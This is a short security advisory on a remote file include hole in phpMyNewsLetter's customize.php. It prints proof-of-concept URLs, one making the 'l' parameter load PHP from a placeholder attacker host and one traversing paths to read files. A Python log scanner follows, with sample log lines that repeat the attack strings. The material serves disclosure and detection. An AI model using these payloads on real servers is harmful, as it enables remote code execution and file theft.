phpMyNewsLetter Remote File Include Vulnerability

The following proof of concept has been supplied by Frog Man:

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With http://[attacker]/code.txt containing:
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view
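
To check a web server for requests of the two shapes shown above, the following added example (not part of the original advisory or of phpMyNewsLetter) scans access-log lines for an `l` parameter sent to /include/customize.php that carries a URL scheme or a `..` path segment. The log lines, the addresses in them, the benign value `english` and the function names are constructed for illustration, and a common/combined log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (documentation IP ranges, not real data).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /include/customize.php?l=http://203.0.113.9/code.txt&text=Hello%20World HTTP/1.1" 200 11',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /include/customize.php?l=..%2Fpath%2Ffile%2Fto%2Fview HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2010:10:01:00 +0000] "GET /include/customize.php?l=english HTTP/1.1" 200 2048',
    '192.0.2.44 - - [01/Jan/2010:10:02:00 +0000] "GET /index.php?l=http://example.org/ HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, php://, ...) or data:
SCHEME_RE = re.compile(r'^(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

def classify(value):
    """Return why an `l` value is suspicious, or None if it looks like a plain name."""
    # Decode repeatedly so double-encoded input (%252e%252e) is caught as well.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if SCHEME_RE.match(value):
        return "remote-include"
    if ".." in value.replace("\\", "/").split("/"):
        return "path-traversal"
    return None

def scan(lines, script="/include/customize.php", param="l"):
    """Return (line_number, reason, value) for each suspicious request to `script`."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line in the assumed log format
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes each value once; classify() handles the rest.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            reason = classify(value)
            if reason:
                hits.append((n, reason, value))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits only show that the request was made; whether the include succeeded depends on the installed version and the PHP configuration.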


 

Copyright 2010, SecurityFocus